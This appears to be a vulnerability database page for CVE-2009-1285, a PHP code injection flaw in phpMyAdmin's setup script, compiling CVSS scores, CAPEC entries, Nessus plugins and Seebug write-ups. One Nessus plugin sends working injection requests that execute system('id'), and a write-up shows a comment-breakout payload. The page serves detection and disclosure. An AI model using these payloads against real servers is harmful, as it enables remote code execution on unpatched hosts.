Vulnerabilities > CVE-2009-1285 - Code Injection vulnerability in PHPmyadmin
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
Static code injection vulnerability in the getConfigFile function in setup/lib/ConfigFile.class.php in phpMyAdmin 3.x before 3.1.3.2 allows remote attackers to inject arbitrary PHP code into configuration files.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 12 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Leverage Executable Code in Non-Executable Files An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
- Manipulating User-Controlled Variables This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.
Nessus
NASL family Fedora Local Security Checks NASL id FEDORA_2009-3700.NASL description Improvements for 3.1.3.2: - [security] Insufficient output sanitizing when generating configuration file http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 36312 published 2009-04-23 reporter This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/36312 title Fedora 10 : phpMyAdmin-3.1.3.2-1.fc10 (2009-3700) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory 2009-3700. # include("compat.inc"); if (description) { script_id(36312); script_version ("1.14"); script_cvs_date("Date: 2019/08/02 13:32:29"); script_cve_id("CVE-2009-1285"); script_bugtraq_id(34526); script_xref(name:"FEDORA", value:"2009-3700"); script_xref(name:"TRA", value:"TRA-2009-02"); script_name(english:"Fedora 10 : phpMyAdmin-3.1.3.2-1.fc10 (2009-3700)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "Improvements for 3.1.3.2: - [security] Insufficient output sanitizing when generating configuration file http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); # http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php script_set_attribute( attribute:"see_also", value:"https://www.phpmyadmin.net/security/PMASA-2009-4/" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=495768" ); # https://lists.fedoraproject.org/pipermail/package-announce/2009-April/022398.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?92439f35" ); script_set_attribute( attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2009-02" ); script_set_attribute( attribute:"solution", value:"Update the affected phpMyAdmin package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_cwe_id(94); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:phpMyAdmin"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:10"); script_set_attribute(attribute:"patch_publication_date", value:"2009/04/15"); script_set_attribute(attribute:"plugin_publication_date", value:"2009/04/23"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! ereg(pattern:"^10([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 10.x", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC10", reference:"phpMyAdmin-3.1.3.2-1.fc10")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "phpMyAdmin"); }
NASL family CGI abuses NASL id PHPMYADMIN_PMASA_2009_4.NASL description The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. This version is affected by the following vulnerabilities : - The setup script inserts the unsanitized verbose server name into a C-style comment during config file generation. - An attacker can save arbitrary data to the generated config file by altering the value of the last seen 2020-06-01 modified 2020-06-02 plugin id 36171 published 2009-04-16 reporter This script is Copyright (C) 2009-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/36171 title phpMyAdmin Setup Script Configuration Parameters Arbitrary PHP Code Injection (PMASA-2009-4) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(36171); script_version("1.16"); script_cvs_date("Date: 2018/07/24 18:56:11"); script_cve_id("CVE-2009-1285"); script_bugtraq_id(34526); script_xref(name:"TRA", value:"TRA-2009-02"); script_xref(name:"Secunia", value:"34727"); script_name(english:"phpMyAdmin Setup Script Configuration Parameters Arbitrary PHP Code Injection (PMASA-2009-4)"); script_summary(english:"Attempts to inject PHP code into config file."); script_set_attribute( attribute:"synopsis", value: "The remote web server contains a PHP application that is affected by a code execution vulnerability."); script_set_attribute( attribute:"description", value: "The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. This version is affected by the following vulnerabilities : - The setup script inserts the unsanitized verbose server name into a C-style comment during config file generation. - An attacker can save arbitrary data to the generated config file by altering the value of the 'textconfig' parameter during a POST request to config.php. An unauthenticated, remote attacker can exploit these issues to execute arbitrary PHP code."); script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2009-02"); script_set_attribute(attribute:"see_also", value:"http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php"); script_set_attribute( attribute:"solution", value: "Upgrade to phpMyAdmin 3.1.3.2. Alternatively, apply the patches referenced in the project's advisory."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"false"); script_cwe_id(94); script_set_attribute(attribute:"plugin_publication_date", value: "2009/04/16"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc."); script_dependencies("phpMyAdmin_detect.nasl"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_ports("Services/www", 80); script_require_keys("www/phpMyAdmin", "www/PHP"); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); port = get_http_port(default:80, embedded:FALSE, php:TRUE); # Test an install. install = get_kb_item(string("www/", port, "/phpMyAdmin")); if (isnull(install)) exit(0); matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$"); if (isnull(matches)) exit(0); pma_dir = matches[2]; injected_code = "system('id');"; eoltype = "unix"; function get_token() { local_var dir, token, url, res, pat, match, item; dir = _FCT_ANON_ARGS[0]; token = NULL; if (isnull(dir)) return NULL; url = string(dir, "/setup/index.php"); clear_cookiejar(); res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE); # Extract the token. token = NULL; pat = 'input type="hidden" name="token" value="([^"]+)"'; matches = egrep(string:res[2], pattern:pat); if (matches) { foreach match (split(matches, keep:FALSE)) { item = eregmatch(pattern:pat, string:match); if (!isnull(item)) { token = item[1]; break; } } } return token; } # Try the first exploit (manipulating the textconfig parameter) token = get_token(pma_dir); if (isnull(token)) exit(0); postdata = string( "check_page_refresh=1&", "convcharset=utf-8&", "token=", token, "&", "eoltype=", eoltype, "&", "textconfig=", injected_code, "&", "submit_download=Download" ); url = string(pma_dir, "/setup/config.php?type=post"); req = http_mk_post_req( port : port, item : url, data : postdata, add_headers : make_array( "Content-Type", "application/x-www-form-urlencoded" ) ); res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE); if (res[2] == injected_code) { security_hole(port); exit(0); } # If that exploit didn't work, try using the comment injection exploit token = get_token(pma_dir); if (isnull(token)) exit(0); # First, get the "add a new server" form... url = string( pma_dir, "/setup/index.php?", "check_page_refresh=&", "lang=en-utf-8&", "convcharset=utf-8&", "token=", token, "&", "page=servers&", "mode=add&", "submit=New+server" ); res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE); # ...then submit all the new server info, including the injection attack... postdata = string( "check_page_refresh=&", "convcharset=utf-8&", "token=", token, "&", "page=servers&", "mode=add&", "submit=New+server&", "UploadDir=/tmp&", "Servers-0-verbose=*/", injected_code, "/*&Servers-0-host=Nessus&Servers-0-port=&Servers-0-socket=&Servers-0-connect_type=tcp&Servers-0-extension=mysqli&Servers-0-auth_type=cookie&Servers-0-user=root&Servers-0-password=&Servers-0-auth_swekey_config=&Servers-0-SignonSession=&Servers-0-SignonURL=&Servers-0-LogoutURL=&Servers-0-only_db=&Servers-0-hide_db=&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowDatabasesCommand=SHOW+DATABASES&Servers-0-CountTables=on&Servers-0-pmadb=&Servers-0-controluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&Servers-0-bookmarktable=&Servers-0-relation=&Servers-0-table_info=&Servers-0-table_coords=&Servers-0-pdf_pages=&Servers-0-column_info=&Servers-0-history=&Servers-0-designer_coords=&submit_save=Save" ); req = http_mk_post_req( port : port, item : url, data : postdata, add_headers : make_array( "Content-Type", "application/x-www-form-urlencoded" ) ); res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE); # ...and check if the injection worked postdata = string( "convcharset=utf-8&", "token=", token, "&", "server[password]=&", "DefaultLang=es&", "ServerDefault=1&", "eol=", eoltype, "&", "submit_display=Display" ); url2 = string(pma_dir, "/setup/index.php?page=config"); req = http_mk_post_req( port : port, item : url2, data : postdata, add_headers : make_array( "Content-Type", "application/x-www-form-urlencoded" ) ); res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE); expected_output = '/* Server: */' + injected_code + '/* [1] */'; if (expected_output >< res[2]) { security_hole(port); }
NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_1A0E4CC629BF11DEBDEB0030843D3802.NASL description phpMyAdmin Team reports : Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. This issue is on different parameters than PMASA-2009-3 and it was missed out of our radar because it was not existing in 2.11.x branch. last seen 2020-06-01 modified 2020-06-02 plugin id 36167 published 2009-04-16 reporter This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/36167 title FreeBSD : phpmyadmin -- insufficient output sanitizing when generating configuration file (1a0e4cc6-29bf-11de-bdeb-0030843d3802) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from the FreeBSD VuXML database : # # Copyright 2003-2019 Jacques Vidrine and contributors # # Redistribution and use in source (VuXML) and 'compiled' forms (SGML, # HTML, PDF, PostScript, RTF and so forth) with or without modification, # are permitted provided that the following conditions are met: # 1. Redistributions of source code (VuXML) must retain the above # copyright notice, this list of conditions and the following # disclaimer as the first lines of this file unmodified. # 2. Redistributions in compiled form (transformed to other DTDs, # published online in any format, converted to PDF, PostScript, # RTF and other formats) must reproduce the above copyright # notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # include("compat.inc"); if (description) { script_id(36167); script_version("1.16"); script_cvs_date("Date: 2019/08/02 13:32:39"); script_cve_id("CVE-2009-1285"); script_xref(name:"TRA", value:"TRA-2009-02"); script_name(english:"FreeBSD : phpmyadmin -- insufficient output sanitizing when generating configuration file (1a0e4cc6-29bf-11de-bdeb-0030843d3802)"); script_summary(english:"Checks for updated package in pkg_info output"); script_set_attribute( attribute:"synopsis", value:"The remote FreeBSD host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "phpMyAdmin Team reports : Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. This issue is on different parameters than PMASA-2009-3 and it was missed out of our radar because it was not existing in 2.11.x branch." ); # http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php script_set_attribute( attribute:"see_also", value:"https://www.phpmyadmin.net/security/PMASA-2009-4/" ); # https://vuxml.freebsd.org/freebsd/1a0e4cc6-29bf-11de-bdeb-0030843d3802.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?79a83fcc" ); script_set_attribute( attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2009-02" ); script_set_attribute(attribute:"solution", value:"Update the affected package."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_cwe_id(94); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:phpMyAdmin"); script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd"); script_set_attribute(attribute:"vuln_publication_date", value:"2009/04/14"); script_set_attribute(attribute:"patch_publication_date", value:"2009/04/15"); script_set_attribute(attribute:"plugin_publication_date", value:"2009/04/16"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"FreeBSD Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info"); exit(0); } include("audit.inc"); include("freebsd_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD"); if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (pkg_test(save_report:TRUE, pkg:"phpMyAdmin<3.1.3.2")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");
NASL family Fedora Local Security Checks NASL id FEDORA_2009-3692.NASL description Improvements for 3.1.3.2: - [security] Insufficient output sanitizing when generating configuration file http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 36165 published 2009-04-16 reporter This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/36165 title Fedora 9 : phpMyAdmin-3.1.3.2-1.fc9 (2009-3692) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory 2009-3692. # include("compat.inc"); if (description) { script_id(36165); script_version ("1.15"); script_cvs_date("Date: 2019/08/02 13:32:29"); script_cve_id("CVE-2009-1285"); script_bugtraq_id(34526); script_xref(name:"FEDORA", value:"2009-3692"); script_xref(name:"TRA", value:"TRA-2009-02"); script_name(english:"Fedora 9 : phpMyAdmin-3.1.3.2-1.fc9 (2009-3692)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "Improvements for 3.1.3.2: - [security] Insufficient output sanitizing when generating configuration file http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); # http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php script_set_attribute( attribute:"see_also", value:"https://www.phpmyadmin.net/security/PMASA-2009-4/" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=495768" ); # https://lists.fedoraproject.org/pipermail/package-announce/2009-April/022388.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?f6918e30" ); script_set_attribute( attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2009-02" ); script_set_attribute( attribute:"solution", value:"Update the affected phpMyAdmin package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_cwe_id(94); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:phpMyAdmin"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:9"); script_set_attribute(attribute:"patch_publication_date", value:"2009/04/15"); script_set_attribute(attribute:"plugin_publication_date", value:"2009/04/16"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! ereg(pattern:"^9([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 9.x", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC9", reference:"phpMyAdmin-3.1.3.2-1.fc9")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "phpMyAdmin"); }
Seebug
bulletinFamily exploit description Well, I usually don’t blog about these bugs but phpMyAdmin is a project that is used almost everywhere and this is a quick and dirty way to get code execution. This issue affects phpMyAdmin 3.x before 3.1.3.2 and it was disclosed on 14 April 2009. The bug is present at setup/lib/ConfigFile.class.php file. Here is an outline of that file from 3.1.3.1 release: 1 <?php ... 10 class ConfigFile 11 { 12 /** 13 * Stores default PMA config from config.default.php 14 * @var array 15 */ 16 private $cfg; ... 259 /** 260 * Creates config file 261 * 262 * @return string 263 */ 264 public function getConfigFile() 265 { 266 $crlf = (isset($_SESSION['eol']) && $_SESSION['eol'] == 'win') ? "\r\n" : "\n"; 267 $c = $_SESSION['ConfigFile']; 268 269 // header 270 $ret = '<?php' . $crlf ... 279 // servers 280 if ($this->getServerCount() > 0) { 281 $ret .= "/* Servers configuration */$crlf\$i = 0;" . $crlf . $crlf; 282 foreach ($c['Servers'] as $id => $server) { 283 $ret .= '/* Server: ' . $this->getServerName($id) . " [$id] */" . $crlf 284 . '$i++;' . $crlf; 285 foreach ($server as $k => $v) { 286 $ret .= "\$cfg['Servers'][\$i]['$k'] = " 287 . var_export($v, true) . ';' . $crlf; 288 } 289 $ret .= $crlf; 290 } 291 $ret .= '/* End of servers configuration */' . $crlf . $crlf; 292 } ... So… function getConfigFile() retrieves various information. Here it constructs a configuration file and $ret includes the PHP code. At line 281 it starts the file with comment: /* Servers configuration */ Then, as you can clearly see at line 283 the configuration will have a new comment which is: /* Server: <getServerName()> "id" */ However, $id is completely user controlled since it’s derived from the session variable ConfigFile at line 267. For example, if a user specifies an $id of: bleh */ <?php echo date(); ?> /* He will end up with a configuration file that includes this: /* Server: <getServerName()> bleh */ <?php echo date(); ?> /* */ This simple code injection was patched by limiting the user input using preg_replace() function like this: foreach ($c['Servers'] as $id => $server) { + $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k); $ret .= '/* Server: ' . $this->getServerName($id) . " [$id] */" . $crlf Which replaces any matches of /[^A-Za-z0-9_]/ with _ and moves on with the next element. The same bug was also in the following code of the same function: 296 // other settings 297 $persistKeys = $this->persistKeys; 298 foreach ($c as $k => $v) { 299 $ret .= "\$cfg['$k'] = " . var_export($v, true) . ';' . $crlf; 300 if (isset($persistKeys[$k])) { 301 unset($persistKeys[$k]); 302 } 303 } Where the exact same logic applies and also the same patch :-P foreach ($c as $k => $v) { + $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k); $ret .= "\$cfg['$k'] = " . var_export($v, true) . ';' . $crlf; There was another instance of that bug at the last loop of that function which was this: 305 // keep 1d array keys which are present in $persist_keys (config_info.inc.php) 306 foreach (array_keys($persistKeys) as $k) { 307 if (strpos($k, '/') === false) { 308 $ret .= "\$cfg['$k'] = " . var_export($this->getDefault($k), true) . ';' . $crlf; 309 } 310 } 311 $ret .= '?>'; 312 313 return $ret; 314 } 315 } 316 ?> Again, the concept is the same in the foreach() loop at line 306 and the patch was of course: if (strpos($k, '/') === false) { + $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k); $ret .= "\$cfg['$k'] = " . var_export($this->getDefault($k), true) . ';' . $crlf; The evil auditors among us would have caught that the bug is still there ;-) phpMyAdmin 3.1.3.2 暂无 <a href=http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php target=_blank rel=external nofollow>http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php</a> <a href=http://www.phpmyadmin.net/home_page/index.php target=_blank rel=external nofollow>http://www.phpmyadmin.net/home_page/index.php</a> id SSV:5112 last seen 2017-11-19 modified 2009-04-25 published 2009-04-25 reporter Root title CVE-2009-1285: phpMyAdmin Code Injection bulletinFamily exploit description BUGTRAQ ID: 34526 CVE(CAN) ID: CVE-2009-1285 phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdmin所使用的setup脚本没有正确地过滤配置参数,如果远程攻击者向服务器提交了恶意的POST请求,就可以在所生成的配置文件中注入任意PHP代码。 phpMyAdmin phpMyAdmin 3.x phpMyAdmin phpMyAdmin 2.11.x phpMyAdmin ---------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: <a href=http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12342 target=_blank rel=external nofollow>http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12342</a> <a href=http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12348 target=_blank rel=external nofollow>http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12348</a> id SSV:5058 last seen 2017-11-19 modified 2009-04-16 published 2009-04-16 reporter Root title phpMyAdmin配置文件PHP代码注入漏洞
References
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_3_1_3/phpMyAdmin/setup/lib/ConfigFile.class.php?r1=12248&r2=12301&pathrev=12342
- http://secunia.com/advisories/34727
- http://secunia.com/advisories/34741
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php
- http://www.securityfocus.com/bid/34526
- http://www.vupen.com/english/advisories/2009/1045
- https://www.redhat.com/archives/fedora-package-announce/2009-April/msg00442.html
- https://www.redhat.com/archives/fedora-package-announce/2009-April/msg00452.html